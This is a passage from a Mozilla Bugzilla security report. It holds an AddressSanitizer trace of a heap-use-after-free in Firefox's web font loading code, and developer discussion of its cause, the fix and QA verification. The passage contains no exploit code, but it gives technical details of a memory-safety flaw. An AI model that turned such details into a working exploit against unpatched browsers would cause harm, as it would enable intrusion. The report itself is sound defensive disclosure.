    #14 0x7f4811330429 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:267:37
    #15 0x7f48126224ac in Call<nsCOMPtr<mozilla::dom::EventTarget> > /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:363:12
    #16 0x7f48126224ac in mozilla::JSEventHandler::HandleEvent(mozilla::dom::Event*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:205
    #17 0x7f48125d1cba in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, mozilla::dom::Event*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1028:22
    #18 0x7f48125d3ad3 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event**, mozilla::dom::EventTarget*, nsEventStatus*, bool) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1220:17
    #19 0x7f48125b4741 in HandleEvent /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/EventListenerManager.h:353:5
    #20 0x7f48125b4741 in mozilla::EventTargetChainItem::HandleEvent(mozilla::EventChainPostVisitor&, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:349
    #21 0x7f48125b2976 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:551:16
    #22 0x7f48125b96e4 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:1047:11
    #23 0x7f48155a6cc8 in nsDocumentViewer::LoadComplete(nsresult) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1154:7
    #24 0x7f4818441053 in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6680:20
    #25 0x7f481844016c in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6480:7
    #26 0x7f4818445b77 in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp
    #27 0x7f480cf03c35 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1337:3
    #28 0x7f480cf0282a in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:896:14
    #29 0x7f480cefce70 in nsDocLoader::DocLoaderIsEmpty(bool) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:730:9
    #30 0x7f480cf006e5 in nsDocLoader::OnStopRequest(nsIRequest*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:618:5
    #31 0x7f480cf02374 in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp
    #32 0x7f480a655311 in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:568:22
    #33 0x7f480e7dcbb8 in DoUnblockOnload /builds/worker/workspace/build/src/dom/base/Document.cpp:10534:18
    #34 0x7f480e7dcbb8 in mozilla::dom::Document::UnblockOnload(bool) /builds/worker/workspace/build/src/dom/base/Document.cpp:10466

previously allocated by thread T0 (Web Content) here:
    #0 0x564c92e7ae03 in __interceptor_malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:146:3
    #1 0x564c92eafb6d in moz_xmalloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:52:15
    #2 0x7f481523e925 in operator new /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:144:10
    #3 0x7f481523e925 in mozilla::dom::FontFaceSet::FontFaceSet(nsPIDOMWindowInner*, mozilla::dom::Document*) /builds/worker/workspace/build/src/layout/style/FontFaceSet.cpp:165
    #4 0x7f480e8584e6 in mozilla::dom::Document::Fonts() /builds/worker/workspace/build/src/dom/base/Document.cpp:14613:24
    #5 0x7f4815231bef in mozilla::dom::FontFace::Constructor(mozilla::dom::GlobalObject const&, nsTSubstring<char16_t> const&, mozilla::dom::StringOrArrayBufferOrArrayBufferView const&, mozilla::dom::FontFaceDescriptors const&, mozilla::ErrorResult&) /builds/worker/workspace/build/src/layout/style/FontFace.cpp:168:52
    #6 0x7f48115eae3b in mozilla::dom::FontFace_Binding::_constructor(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/FontFaceBinding.cpp:1764:54
    #7 0x7f481961240d in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448:13
    #8 0x7f481961240d in CallJSNativeConstructor /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:464
    #9 0x7f481961240d in InternalConstruct(JSContext*, js::AnyConstructArgs const&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:657
    #10 0x7f48195ef0fd in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3078:16
    #11 0x7f48195d964e in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:425:10
    #12 0x7f4819614fcc in js::ExecuteKernel(JSContext*, JS::Handle<JSScript*>, JSObject&, JS::Value const&, js::AbstractFramePtr, JS::Value*) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:787:13
    #13 0x7f48197105f1 in EvalKernel(JSContext*, JS::Handle<JS::Value>, EvalType, js::AbstractFramePtr, JS::Handle<JSObject*>, unsigned char*, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/builtin/Eval.cpp:326:10
    #14 0x7f481970fbd8 in js::IndirectEval(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/js/src/builtin/Eval.cpp:424:10
    #15 0x7f481960e7c5 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448:13
    #16 0x7f481960e7c5 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:540
    #17 0x7f48195ef238 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:599:10
    #18 0x7f48195ef238 in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3087
    #19 0x7f48195d964e in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:425:10
    #20 0x7f481960f018 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:568:13
    #21 0x7f4819611462 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:611:8
    #22 0x7f481a28f548 in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2655:10
    #23 0x7f4811330429 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:267:37
    #24 0x7f48126224ac in Call<nsCOMPtr<mozilla::dom::EventTarget> > /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:363:12
    #25 0x7f48126224ac in mozilla::JSEventHandler::HandleEvent(mozilla::dom::Event*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:205
    #26 0x7f48125d1cba in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, mozilla::dom::Event*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1028:22
    #27 0x7f48125d3ad3 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event**, mozilla::dom::EventTarget*, nsEventStatus*, bool) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1220:17
    #28 0x7f48125b4741 in HandleEvent /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/EventListenerManager.h:353:5
    #29 0x7f48125b4741 in mozilla::EventTargetChainItem::HandleEvent(mozilla::EventChainPostVisitor&, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:349
    #30 0x7f48125b2976 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:551:16
    #31 0x7f48125b96e4 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:1047:11
    #32 0x7f48155a6cc8 in nsDocumentViewer::LoadComplete(nsresult) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1154:7
    #33 0x7f4818441053 in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6680:20
    #34 0x7f481844016c in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6480:7
    #35 0x7f4818445b77 in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp
    #36 0x7f480cf03c35 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1337:3

SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/gfx/thebes/gfxUserFontSet.cpp:740:15 in gfxUserFontEntry::LoadPlatformFont(unsigned char const*, unsigned int, gfxUserFontType, unsigned char const*, unsigned int, nsTArray<nsTString<char> >&&)
Shadow bytes around the buggy address:
  0x0c1080006ff0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c1080007000: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c1080007010: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c1080007020: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
  0x0c1080007030: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
=>0x0c1080007040: fa fa fa fa[fd]fd fd fd fd fd fd fd fd fd fd fa
  0x0c1080007050: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c1080007060: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c1080007070: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
  0x0c1080007080: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
  0x0c1080007090: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==23329==ABORTING
Attached file ASAN output
Attached file Junction-webfont.eot
Group: core-security → layout-core-security

[Tracking Requested - why for this release]: This code was recently introduced in bug 1490792.

tracking-firefox69: --- → ?
Flags: needinfo?(cam)
Regressed by: 1490792
Keywords: regression

I believe this feature is preffed off by default as of https://hg.mozilla.org/mozilla-central/rev/597d2f60a811 ?

This is not explicitly set in the prefs.js I used

Yes, but I just landed a fix and preffed it on a few days ago.

Flags: needinfo?(cam)

Thanks for the report, Nils. I'll look into this.

Assignee: nobody → cam
Status: NEW → ASSIGNED

The issue is that the gfxUserFontSet can go away due to the old page being navigated away from, and that happens between the runnable being dispatched to the FontLoader thread, and that work completing and coming back to the main thread to continue with the platform font creation. We need to hold on to the gfxUserFontSet for the duration of that work to avoid that. (I decided to use bare NS_ADDREF / NS_RELEASE calls rather than adding seemingly unused RefPtr<gfxUserFontSet> arguments to the runnables.)

(In reply to Cameron McCormack (:heycam) from comment #11)

(rookie mistake using NS_RELEASE)

Oops .... yeah, sorry - I wasn't alert to that either!

https://hg.mozilla.org/integration/autoland/rev/e28113111ddf00a8ba30b6d8e6ad9df5a7ed3305
https://hg.mozilla.org/mozilla-central/rev/e28113111ddf

Group: layout-core-security → core-security-release
Status: ASSIGNED → RESOLVED
Closed: 5 years ago
status-firefox69: affectedfixed
Resolution: --- → FIXED
Target Milestone: --- → mozilla69
Flags: qe-verify+
Whiteboard: [post-critsmash-triage]

I have managed to reproduce this issue using Firefox 69.0a1 (BuildId:20190613095424) fuzzing asan build.

This issue is verified fixed using Firefox 69.0b7 (20190724012138) and Firefox 70.0a1 (BuildId:20190725035331) fuzzing asan build on Ubuntu 18.04 64bit.

Status: RESOLVED → VERIFIED
status-firefox69: fixedverified
status-firefox70: --- → verified
Flags: qe-verify+
Flags: sec-bounty?
Flags: sec-bounty? → sec-bounty+
Group: core-security-release
Has Regression Range: --- → yes
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: